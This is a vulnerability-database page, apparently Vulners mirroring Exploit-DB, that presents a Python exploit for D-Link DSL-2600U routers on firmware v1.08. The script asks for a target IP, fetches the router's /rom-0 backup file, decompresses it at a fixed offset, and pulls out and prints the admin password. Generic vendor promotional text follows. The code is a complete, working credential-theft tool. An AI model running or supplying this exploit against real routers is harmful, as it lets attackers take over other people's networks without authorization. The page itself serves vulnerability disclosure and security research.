Lucene search
K

D-Link DSL2600U - 'rom-0' Admin Password Disclosure

🗓️ 26 May 2026 00:00:00Reported by Amir Hossein JamshidiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 53 Views

D-Link DSL2600U ROM-0 admin password disclosure exploit affecting firmware version 1.08.

Code
# Exploit Title: D-Link DSL2600U - 'rom-0' Admin Password Disclosure
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://www.dlink.com
# Version: DSL-2600U
# Tested on: ubuntu
# CVE : N/A
# Firmware Version: v1.08
from routersploit.libs.lzs.lzs import LZSDecompress
import requests
import re
import sys
print('''
    #################################################################################
    #        D-Link Router - 'rom-0' Admin Password Disclosure                      #
    #                   BY: Amir Hossein Jamshidi                                   #
    #               Mail: [email protected]                           #
    #           github: https://github.com/amirhosseinjamshidi64                    #
    #                    Usage: python expoit.py                                    #
    #################################################################################
''')
def exploit(url):
    data = requests.get(f"{url}/rom-0")
    #with open("data", 'wb') as f:
    #    f.write(data.content)
    data = data.content
    pos = 8568
    res, win = LZSDecompress(data[pos:])
    password = re.findall("([\040-\176]{5,})", res)
    return password[0]
if __name__ == "__main__":
    url = input("Enter Target IP (example: http://192.168.1.1): ")
    print("password is: " + '\t' + exploit(url))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation